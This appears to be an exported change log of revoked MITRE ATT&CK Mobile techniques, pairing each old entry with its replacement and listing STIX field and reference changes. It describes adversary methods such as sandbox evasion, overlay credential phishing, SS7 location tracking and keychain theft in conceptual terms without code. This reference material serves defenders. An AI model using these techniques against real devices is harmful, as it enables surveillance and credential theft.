external_references[2]['external_id']APP-1APP-0
external_references[3]['source_name']mHealthNIST Mobile Threat Catalogue
external_references[3]['url']https://experts.illinois.edu/en/publications/security-concerns-in-android-mhealth-appshttps://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html

[T1523] Evade Analysis Environment

Current version: 1.0

Description: Malicious applications may attempt to detect their operating environment prior to fully executing their payloads. These checks are often used to ensure the application is not running within an analysis environment such as a sandbox used for application vetting, security research, or reverse engineering. Adversaries may use many different checks such as physical sensors, location, and system properties to fingerprint emulators and sandbox environments.(Citation: Talos Gustuff Apr 2019)(Citation: ThreatFabric Cerberus)(Citation: Xiao-ZergHelper)(Citation: Cyberscoop Evade Analysis January 2019) Adversaries may access `android.os.SystemProperties` via Java reflection to obtain specific system information.(Citation: Github Anti-emulator) Standard values such as phone number, IMEI, IMSI, device IDs, and device drivers may be checked against default signatures of common sandboxes.(Citation: Sophos Anti-emulation)

This object has been revoked by [T1633.001] System Checks

Description for [T1633.001] System Checks: Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behavior after checking for the presence of artifacts indicative of a virtual environment or sandbox. If the adversary detects a virtual environment, they may alter their malware’s behavior to disengage from the victim or conceal the core functions of the implant. They may also search for virtualization artifacts before dropping secondary or additional payloads. Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Hardware checks, such as the presence of motion sensors, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2019-10-11 14:48:50.525000+00:002022-03-30 17:54:56.590000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']Talos Gustuff Apr 2019Sophos Anti-emulation
external_references[1]['description']Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019.Chen Yu et al. . (2017, April 13). Android malware anti-emulation techniques. Retrieved October 2, 2019.
external_references[1]['url']https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.htmlhttps://news.sophos.com/en-us/2017/04/13/android-malware-anti-emulation-techniques/
external_references[2]['source_name']ThreatFabric CerberusXiao-ZergHelper
external_references[2]['description']ThreatFabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved September 18, 2019.Claud Xiao. (2016, February 21). Pirated iOS App Store’s Client Successfully Evaded Apple iOS Code Review. Retrieved December 12, 2016.
external_references[2]['url']https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.htmlhttp://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/
external_references[3]['source_name']Xiao-ZergHelperCyberscoop Evade Analysis January 2019
external_references[3]['description']Claud Xiao. (2016, February 21). Pirated iOS App Store’s Client Successfully Evaded Apple iOS Code Review. Retrieved December 12, 2016.Jeff Stone. (2019, January 18). Sneaky motion-detection feature found on Android malware. Retrieved October 2, 2019.
external_references[3]['url']http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/https://www.cyberscoop.com/android-malware-motion-detection-trend-micro/
external_references[4]['source_name']Cyberscoop Evade Analysis January 2019ThreatFabric Cerberus
external_references[4]['description']Jeff Stone. (2019, January 18). Sneaky motion-detection feature found on Android malware. Retrieved October 2, 2019.ThreatFabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved September 18, 2019.
external_references[4]['url']https://www.cyberscoop.com/android-malware-motion-detection-trend-micro/https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html
external_references[6]['source_name']Sophos Anti-emulationTalos Gustuff Apr 2019
external_references[6]['description']Chen Yu et al. . (2017, April 13). Android malware anti-emulation techniques. Retrieved October 2, 2019.Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019.
external_references[6]['url']https://news.sophos.com/en-us/2017/04/13/android-malware-anti-emulation-techniques/https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html

[T1438] Exfiltration Over Other Network Medium

Current version: 2.0

Description: Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a standard Internet connection, the exfiltration may occur, for example, via Bluetooth, or another radio frequency (RF) channel. Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.

This object has been revoked by [T1644] Out of Band Data

Description for [T1644] Out of Band Data: Adversaries may communicate with compromised devices using out of band data streams. This could be done for a variety of reasons, including evading network traffic monitoring, as a backup method of command and control, or for data exfiltration if the device is not connected to any Internet-providing networks (i.e. cellular or Wi-Fi). Several out of band data streams exist, such as SMS messages, NFC, and Bluetooth. On Android, applications can read push notifications to capture content from SMS messages, or other out of band data streams. This requires that the user manually grant notification access to the application via the settings menu. However, the application could launch an Intent to take the user directly there. On iOS, there is no way to programmatically read push notifications.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detectionExfiltration over other network mediums can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1041
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-04-18 19:46:02.529000+00:00
nameAlternate Network MediumsExfiltration Over Other Network Medium
descriptionAdversaries can communicate using cellular networks rather than enterprise Wi-Fi in order to bypass enterprise network monitoring systems. Adversaries may also communicate using other non-Internet Protocol mediums such as SMS, NFC, or Bluetooth to bypass network monitoring systems.Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a standard Internet connection, the exfiltration may occur, for example, via Bluetooth, or another radio frequency (RF) channel. Adversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
x_mitre_version1.02.0
iterable_item_removed
STIX FieldOld valueNew Value
kill_chain_phases{'kill_chain_name': 'mitre-mobile-attack', 'phase_name': 'exfiltration'}

[T1450] Exploit SS7 to Track Device Location

Current version: 1.1

Description: An adversary could exploit signaling system vulnerabilities to track the location of mobile devices. (Citation: Engel-SS7) (Citation: Engel-SS7-2008) (Citation: 3GPP-Security) (Citation: Positive-SS7) (Citation: CSRIC5-WG10-FinalReport)

This object has been revoked by [T1430.002] Impersonate SS7 Nodes

Description for [T1430.002] Impersonate SS7 Nodes: Adversaries may exploit the lack of authentication in signaling system network nodes to track the to track the location of mobile devices by impersonating a node.(Citation: Engel-SS7)(Citation: Engel-SS7-2008)(Citation: 3GPP-Security)(Citation: Positive-SS7)(Citation: CSRIC5-WG10-FinalReport) By providing the victim’s MSISDN (phone number) and impersonating network internal nodes to query subscriber information from other nodes, adversaries may use data collected from each hop to eventually determine the device’s geographical cell area or nearest cell tower.(Citation: Engel-SS7)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references3GPP. (2000, January). A Guide to 3rd Generation Security. Retrieved December 19, 2016.
external_referenceshttps://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.html
external_referencesCEL-38
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1053
external_referencesCEL-38
external_referenceshttps://www.youtube.com/watch?v=q0n5ySqbfdI
external_referencesCSRIC-WG1-FinalReport
values_changed
STIX FieldOld valueNew Value
modified2019-02-03 15:06:10.014000+00:002022-04-05 19:54:12.657000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat Catalogue3GPP-Security
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-38.htmlhttp://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdf
external_references[2]['source_name']Engel-SS7CSRIC5-WG10-FinalReport
external_references[2]['description']Tobias Engel. (2014, December). SS7: Locate. Track. Manipulate.. Retrieved December 19, 2016.Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017.
external_references[2]['url']https://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdfhttps://www.fcc.gov/files/csric5-wg10-finalreport031517pdf
external_references[3]['source_name']Engel-SS7-2008CSRIC-WG1-FinalReport
external_references[3]['description']Tobias Engel. (2008, December). Locating Mobile Phones using SS7. Retrieved December 19, 2016.CSRIC-WG1-FinalReport
external_references[4]['source_name']3GPP-SecurityPositive-SS7
external_references[4]['description']3GPP. (2000, January). A Guide to 3rd Generation Security. Retrieved December 19, 2016.Positive Technologies. (n.d.). SS7 Attack Discovery. Retrieved December 19, 2016.
external_references[4]['url']http://www.3gpp.org/ftp/tsg_sa/wg3_security/_specs/33900-120.pdfhttps://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdf
external_references[5]['source_name']Positive-SS7Engel-SS7-2008
external_references[5]['description']Positive Technologies. (n.d.). SS7 Attack Discovery. Retrieved December 19, 2016.Tobias Engel. (2008, December). Locating Mobile Phones using SS7. Retrieved December 19, 2016.
external_references[5]['url']https://www.ptsecurity.com/upload/ptcom/PT-SS7-AD-Data-Sheet-eng.pdfhttps://www.youtube.com/watch?v=q0n5ySqbfdI
external_references[6]['source_name']CSRIC5-WG10-FinalReportEngel-SS7
external_references[6]['description']Communications Security, Reliability, Interoperability Council (CSRIC). (2017, March). Working Group 10 Legacy Systems Risk Reductions Final Report. Retrieved May 24, 2017.Tobias Engel. (2014, December). SS7: Locate. Track. Manipulate.. Retrieved December 19, 2016.
external_references[6]['url']https://www.fcc.gov/files/csric5-wg10-finalreport031517pdfhttps://berlin.ccc.de/~tobias/31c3-ss7-locate-track-manipulate.pdf
external_references[7]['source_name']CSRIC-WG1-FinalReportNIST Mobile Threat Catalogue

[T1472] Generate Fraudulent Advertising Revenue

Current version: 1.0

Description: An adversary could seek to generate fraudulent advertising revenue from mobile devices, for example by triggering automatic clicks of advertising links without user involvement.

This object has been revoked by [T1643] Generate Traffic from Victim

Description for [T1643] Generate Traffic from Victim: Adversaries may generate outbound traffic from devices. This is typically performed to manipulate external outcomes, such as to achieve carrier billing fraud or to manipulate app store rankings or ratings. Outbound traffic is typically generated as SMS messages or general web traffic, but may take other forms as well. If done via SMS messages, Android apps must hold the `SEND_SMS` permission. Additionally, sending an SMS message requires user consent if the recipient is a premium number. Applications cannot send SMS messages on iOS

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_detection
x_mitre_domains['mobile-attack']
x_mitre_is_subtechniqueFalse
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1075
values_changed
STIX FieldOld valueNew Value
modified2019-07-03 20:21:22.168000+00:002022-04-06 13:57:49.177000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack

[T1581] Geofencing

Current version: 1.0

Description: Adversaries may use a device’s geographical location to limit certain malicious behaviors. For example, malware operators may limit the distribution of a second stage payload to certain geographic regions.(Citation: Lookout eSurv) [Geofencing](https://attack.mitre.org/techniques/T1581) is accomplished by persuading the user to grant the application permission to access location services. The application can then collect, process, and exfiltrate the device’s location to perform location-based actions, such as ceasing malicious behavior or showing region-specific advertisements. One method to accomplish [Geofencing](https://attack.mitre.org/techniques/T1581) on Android is to use the built-in Geofencing API to automatically trigger certain behaviors when the device enters or exits a specified radius around a geographical location. Similar to other [Geofencing](https://attack.mitre.org/techniques/T1581) methods, this requires that the user has granted the `ACCESS_FINE_LOCATION` and `ACCESS_BACKGROUND_LOCATION` permissions. The latter is only required if the application targets Android 10 (API level 29) or higher. However, Android 11 introduced additional permission controls that may restrict background location collection based on user permission choices at runtime. These additional controls include “Allow only while using the app”, which will effectively prohibit background location collection.(Citation: Android Geofencing API) Similarly, on iOS, developers can use built-in APIs to setup and execute geofencing. Depending on the use case, the app will either need to call `requestWhenInUseAuthorization()` or `requestAlwaysAuthorization()`, depending on when access to the location services is required. Similar to Android, users also have the option to limit when the application can access the device’s location, including one-time use and only when the application is running in the foreground.(Citation: Apple Location Services) [Geofencing](https://attack.mitre.org/techniques/T1581) can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. For example, location data could be used to limit malware spread and/or capabilities, which could also potentially evade application analysis environments (ex: malware analysis outside of the target geographic area). Other malicious usages could include showing language-specific [Input Prompt](https://attack.mitre.org/techniques/T1411)s and/or advertisements.

This object has been revoked by [T1627.001] Geofencing

Description for [T1627.001] Geofencing: Adversaries may use a device’s geographical location to limit certain malicious behaviors. For example, malware operators may limit the distribution of a second stage payload to certain geographic regions.(Citation: Lookout eSurv) [Geofencing](https://attack.mitre.org/techniques/T1627/001) is accomplished by persuading the user to grant the application permission to access location services. The application can then collect, process, and exfiltrate the device’s location to perform location-based actions, such as ceasing malicious behavior or showing region-specific advertisements. One method to accomplish [Geofencing](https://attack.mitre.org/techniques/T1627/001) on Android is to use the built-in Geofencing API to automatically trigger certain behaviors when the device enters or exits a specified radius around a geographical location. Similar to other [Geofencing](https://attack.mitre.org/techniques/T1627/001) methods, this requires that the user has granted the `ACCESS_FINE_LOCATION` and `ACCESS_BACKGROUND_LOCATION` permissions. The latter is only required if the application targets Android 10 (API level 29) or higher. However, Android 11 introduced additional permission controls that may restrict background location collection based on user permission choices at runtime. These additional controls include "Allow only while using the app", which will effectively prohibit background location collection. Similarly, on iOS, developers can use built-in APIs to setup and execute geofencing. Depending on the use case, the app will either need to call `requestWhenInUseAuthorization()` or `requestAlwaysAuthorization()`, depending on when access to the location services is required. Similar to Android, users also have the option to limit when the application can access the device’s location, including one-time use and only when the application is running in the foreground. [Geofencing](https://attack.mitre.org/techniques/T1627/001) can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. For example, location data could be used to limit malware spread and/or capabilities, which could also potentially evade application analysis environments (ex: malware analysis outside of the target geographic area). Other malicious usages could include showing language-specific input prompts and/or advertisements.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-10-01 12:43:41.494000+00:002022-03-30 20:43:31.244000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[2]['source_name']Android Geofencing APIApple Location Services
external_references[2]['description']Google. (n.d.). Create and monitor geofences. Retrieved September 11, 2020.Apple. (n.d.). Requesting Authorization for Location Services. Retrieved September 11, 2020.
external_references[2]['url']https://developer.android.com/training/location/geofencinghttps://developer.apple.com/documentation/corelocation/requesting_authorization_for_location_services
external_references[3]['source_name']Apple Location ServicesAndroid Geofencing API
external_references[3]['description']Apple. (n.d.). Requesting Authorization for Location Services. Retrieved September 11, 2020.Google. (n.d.). Create and monitor geofences. Retrieved September 11, 2020.
external_references[3]['url']https://developer.apple.com/documentation/corelocation/requesting_authorization_for_location_serviceshttps://developer.android.com/training/location/geofencing

[T1411] Input Prompt

Current version: 2.1

Description: The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Adversaries may mimic this functionality to prompt users for sensitive information. Compared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique’s use.(Citation: Felt-PhishingOnMobileDevices) Specific approaches to this technique include: ### Impersonate the identity of a legitimate application A malicious application could impersonate the identity of a legitimate application (e.g. use the same application name and/or icon) and get installed on the device. The malicious app could then prompt the user for sensitive information.(Citation: eset-finance) ### Display a prompt on top of a running legitimate application A malicious application could display a prompt on top of a running legitimate application to trick users into entering sensitive information into the malicious application rather than the legitimate application. Typically, the malicious application would need to know when the targeted application (and individual activity within the targeted application) is running in the foreground, so that the malicious application knows when to display its prompt. Android 5.0 and 5.1.1, respectively, increased the difficulty of determining the current foreground application through modifications to the `ActivityManager` API.(Citation: Android-getRunningTasks)(Citation: StackOverflow-getRunningAppProcesses). A malicious application can still abuse Android’s accessibility features to determine which application is currently in the foreground.(Citation: ThreatFabric Cerberus) Approaches to display a prompt include: * A malicious application could start a new activity on top of a running legitimate application.(Citation: Felt-PhishingOnMobileDevices)(Citation: Hassell-ExploitingAndroid) Android 10 places new restrictions on the ability for an application to start a new activity on top of another application, which may make it more difficult for adversaries to utilize this technique.(Citation: Android Background) * A malicious application could create an application overlay window on top of a running legitimate application. Applications must hold the `SYSTEM_ALERT_WINDOW` permission to create overlay windows. This permission is handled differently than typical Android permissions, and at least under certain conditions is automatically granted to applications installed from the Google Play Store.(Citation: Cloak and Dagger)(Citation: NowSecure Android Overlay)(Citation: Skycure-Accessibility) The `SYSTEM_ALERT_WINDOW` permission and its associated ability to create application overlay windows are expected to be deprecated in a future release of Android in favor of a new API.(Citation: XDA Bubbles) ### Fake device notifications A malicious application could send fake device notifications to the user. Clicking on the device notification could trigger the malicious application to display an input prompt.(Citation: Group IB Gustuff Mar 2019)

This object has been revoked by [T1417.002] GUI Input Capture

Description for [T1417.002] GUI Input Capture: Adversaries may mimic common operating system GUI components to prompt users for sensitive information with a seemingly legitimate prompt. The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Compared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique’s use.(Citation: Felt-PhishingOnMobileDevices) There are several approaches adversaries may use to mimic this functionality. Adversaries may impersonate the identity of a legitimate application (e.g. use the same application name and/or icon) and, when installed on the device, may prompt the user for sensitive information.(Citation: eset-finance) Adversaries may also send fake device notifications to the user that may trigger the display of an input prompt when clicked.(Citation: Group IB Gustuff Mar 2019) Additionally, adversaries may display a prompt on top of a running, legitimate application to trick users into entering sensitive information into a malicious application rather than the legitimate application. Typically, adversaries need to know when the targeted application and the individual activity within the targeted application is running in the foreground to display the prompt at the proper time. Adversaries can abuse Android’s accessibility features to determine which application is currently in the foreground.(Citation: ThreatFabric Cerberus) Two known approaches to displaying a prompt include: * Adversaries start a new activity on top of a running legitimate application.(Citation: Felt-PhishingOnMobileDevices)(Citation: Hassell-ExploitingAndroid) Android 10 places new restrictions on the ability for an application to start a new activity on top of another application, which may make it more difficult for adversaries to utilize this technique.(Citation: Android Background) * Adversaries create an application overlay window on top of a running legitimate application. Applications must hold the `SYSTEM_ALERT_WINDOW` permission to create overlay windows. This permission is handled differently than typical Android permissions and, at least under certain conditions, is automatically granted to applications installed from the Google Play Store.(Citation: Cloak and Dagger)(Citation: NowSecure Android Overlay)(Citation: Skycure-Accessibility) The `SYSTEM_ALERT_WINDOW` permission and its associated ability to create application overlay windows are expected to be deprecated in a future release of Android in favor of a new API.(Citation: XDA Bubbles)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesA.P. Felt and D. Wagner. (2011, May 26). Phishing on Mobile Devices. Retrieved August 25, 2016.
external_referencesAPP-31
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1014
external_referencesAPP-31
external_referencesGroup-IB. (2019, March 28). Group-IB uncovers Android Trojan named «Gustuff» capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications. Retrieved September 3, 2019.
values_changed
STIX FieldOld valueNew Value
modified2020-06-24 15:04:20.321000+00:002022-04-05 19:52:32.190000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueFelt-PhishingOnMobileDevices
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.htmlhttp://w2spconf.com/2011/papers/felt-mobilephishing.pdf
external_references[2]['source_name']Felt-PhishingOnMobileDevicesAndroid Background
external_references[2]['description']A.P. Felt and D. Wagner. (2011, May 26). Phishing on Mobile Devices. Retrieved August 25, 2016.Android Developers. (n.d.). Restrictions on starting activities from the background. Retrieved September 18, 2019.
external_references[2]['url']http://w2spconf.com/2011/papers/felt-mobilephishing.pdfhttps://developer.android.com/guide/components/activities/background-starts
external_references[3]['source_name']eset-financeAndroid-getRunningTasks
external_references[3]['description']Lukáš Štefanko. (2016, July 7). Fake finance apps on Google Play target users from around the world. Retrieved September 24, 2018.Android. (n.d.). ActivityManager getRunningTasks documentation. Retrieved January 19, 2017.
external_references[3]['url']https://www.welivesecurity.com/2018/09/19/fake-finance-apps-google-play-target-around-world/https://developer.android.com/reference/android/app/ActivityManager.html#getRunningTasks%28int%29
external_references[4]['source_name']Android-getRunningTasksCloak and Dagger
external_references[4]['description']Android. (n.d.). ActivityManager getRunningTasks documentation. Retrieved January 19, 2017.Fratantonio, Y., et al.. (2017). Cloak & Dagger. Retrieved September 18, 2019.
external_references[4]['url']https://developer.android.com/reference/android/app/ActivityManager.html#getRunningTasks%28int%29http://cloak-and-dagger.org/
external_references[5]['source_name']StackOverflow-getRunningAppProcessesGroup IB Gustuff Mar 2019
external_references[5]['description']Various. (n.d.). Android 5.1.1 and above - getRunningAppProcesses() returns my application package only. Retrieved January 19, 2017.Group-IB. (2019, March 28). Group-IB uncovers Android Trojan named «Gustuff» capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications. Retrieved September 3, 2019.
external_references[5]['url']http://stackoverflow.com/questions/30619349/android-5-1-1-and-above-getrunningappprocesses-returns-my-application-packaghttps://www.group-ib.com/blog/gustuff
external_references[6]['source_name']ThreatFabric Cerberuseset-finance
external_references[6]['description']ThreatFabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved September 18, 2019.Lukáš Štefanko. (2016, July 7). Fake finance apps on Google Play target users from around the world. Retrieved September 24, 2018.
external_references[6]['url']https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.htmlhttps://www.welivesecurity.com/2018/09/19/fake-finance-apps-google-play-target-around-world/
external_references[8]['source_name']Android BackgroundXDA Bubbles
external_references[8]['description']Android Developers. (n.d.). Restrictions on starting activities from the background. Retrieved September 18, 2019.Rahman, M.. (2019, May 8). Bubbles in Android Q will fully replace the overlay API in a future Android version. Retrieved September 18, 2019.
external_references[8]['url']https://developer.android.com/guide/components/activities/background-startshttps://www.xda-developers.com/android-q-system-alert-window-deprecate-bubbles/
external_references[9]['source_name']Cloak and DaggerNowSecure Android Overlay
external_references[9]['description']Fratantonio, Y., et al.. (2017). Cloak & Dagger. Retrieved September 18, 2019.Ramirez, T.. (2017, May 25). ‘SAW’-ing through the UI: Android overlay malware and the System Alert Window permission explained. Retrieved September 18, 2019.
external_references[9]['url']http://cloak-and-dagger.org/https://www.nowsecure.com/blog/2017/05/25/android-overlay-malware-system-alert-window-permission/
external_references[10]['source_name']NowSecure Android OverlayThreatFabric Cerberus
external_references[10]['description']Ramirez, T.. (2017, May 25). ‘SAW’-ing through the UI: Android overlay malware and the System Alert Window permission explained. Retrieved September 18, 2019.ThreatFabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved September 18, 2019.
external_references[10]['url']https://www.nowsecure.com/blog/2017/05/25/android-overlay-malware-system-alert-window-permission/https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html
external_references[11]['source_name']Skycure-AccessibilityStackOverflow-getRunningAppProcesses
external_references[11]['description']Yair Amit. (2016, March 3). “Accessibility Clickjacking” – The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. Retrieved December 21, 2016.Various. (n.d.). Android 5.1.1 and above - getRunningAppProcesses() returns my application package only. Retrieved January 19, 2017.
external_references[11]['url']https://www.skycure.com/blog/accessibility-clickjacking/http://stackoverflow.com/questions/30619349/android-5-1-1-and-above-getrunningappprocesses-returns-my-application-packag
external_references[12]['source_name']XDA BubblesSkycure-Accessibility
external_references[12]['description']Rahman, M.. (2019, May 8). Bubbles in Android Q will fully replace the overlay API in a future Android version. Retrieved September 18, 2019.Yair Amit. (2016, March 3). “Accessibility Clickjacking” – The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. Retrieved December 21, 2016.
external_references[12]['url']https://www.xda-developers.com/android-q-system-alert-window-deprecate-bubbles/https://www.skycure.com/blog/accessibility-clickjacking/
external_references[13]['source_name']Group IB Gustuff Mar 2019NIST Mobile Threat Catalogue
external_references[13]['url']https://www.group-ib.com/blog/gustuffhttps://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html

[T1478] Install Insecure or Malicious Configuration

Current version: 1.0

Description: An adversary could attempt to install insecure or malicious configuration settings on the mobile device, through means such as phishing emails or text messages either directly containing the configuration settings as an attachment, or containing a web link to the configuration settings. The device user may be tricked into installing the configuration settings through social engineering techniques (Citation: Symantec-iOSProfile). For example, an unwanted Certification Authority (CA) certificate could be placed in the device's trusted certificate store, increasing the device's susceptibility to adversary-in-the-middle network attacks seeking to eavesdrop on or manipulate the device's network communication ([Eavesdrop on Insecure Network Communication](https://attack.mitre.org/techniques/T1439) and [Manipulate Device Communication](https://attack.mitre.org/techniques/T1463)). On iOS, malicious Configuration Profiles could contain unwanted Certification Authority (CA) certificates or other insecure settings such as unwanted proxy server or VPN settings to route the device's network traffic through an adversary's system. The device could also potentially be enrolled into a malicious Mobile Device Management (MDM) system (Citation: Talos-MDM).

This object has been revoked by [T1632.001] Code Signing Policy Modification

Description for [T1632.001] Code Signing Policy Modification: Adversaries may modify code signing policies to enable execution of applications signed with unofficial or unknown keys. Code signing provides a level of authenticity on an app from a developer, guaranteeing that the program has not been tampered with and comes from an official source. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on a device. Mobile devices generally enable these security controls by default, such as preventing the installation of unknown applications on Android. Adversaries may modify these policies in a number of ways, including [Input Injection](https://attack.mitre.org/techniques/T1516) or malicious configuration profiles.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesWarren Mercer, Paul Rascagneres, Andrew Williams. (2018, July 12). Advanced Mobile Malware Campaign in India uses Malicious MDM. Retrieved September 24, 2018.
external_referencesSTA-7
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-T1081
external_referencesSTA-7
external_referencesWarren Mercer, Paul Rascagneres, Andrew Williams. (2018, July 12). Advanced Mobile Malware Campaign in India uses Malicious MDM. Retrieved September 24, 2018.
values_changed
STIX FieldOld valueNew Value
modified2021-11-01 18:29:08.293000+00:002022-03-30 18:18:15.903000+00:00
revokedFalseTrue
external_references[0]['source_name']mitre-mobile-attackmitre-attack
external_references[1]['source_name']NIST Mobile Threat CatalogueTalos-MDM
external_references[1]['url']https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-7.htmlhttps://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM.html
external_references[3]['source_name']Talos-MDMNIST Mobile Threat Catalogue
external_references[3]['url']https://blog.talosintelligence.com/2018/07/Mobile-Malware-Campaign-uses-Malicious-MDM.htmlhttps://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-7.html

[T1579] Keychain

Current version: 1.0

Description: Adversaries may collect the keychain storage data from an iOS device to acquire credentials. Keychains are the built-in way for iOS to keep track of users' passwords and credentials for many services and features such as Wi-Fi passwords, websites, secure notes, certificates, private keys, and VPN credentials. On the device, the keychain database is stored outside of application sandboxes to prevent unauthorized access to the raw data. Standard iOS APIs allow applications access to their own keychain contained within the database. By utilizing a privilege escalation exploit or existing root access, an adversary can access the entire encrypted database.(Citation: Apple Keychain Services)(Citation: Elcomsoft Decrypt Keychain)

This object has been revoked by [T1634.001] Keychain

Description for [T1634.001] Keychain: Adversaries may collect keychain data from an iOS device to acquire credentials. Keychains are the built-in way for iOS to keep track of users' passwords and credentials for many services and features such as Wi-Fi passwords, websites, secure notes, certificates, private keys, and VPN credentials. On the device, the keychain database is stored outside of application sandboxes to prevent unauthorized access to the raw data. Standard iOS APIs allow applications access to their own keychain contained within the database. By utilizing a privilege escalation exploit or existing root access, adversaries can access the entire encrypted database.(Citation: Apple Keychain Services)(Citation: Elcomsoft Decrypt Keychain)

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesApple, Inc.. (n.d.). Keychain Services. Retrieved June 24, 2020.
external_referencesAUT-11
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesAUT-11
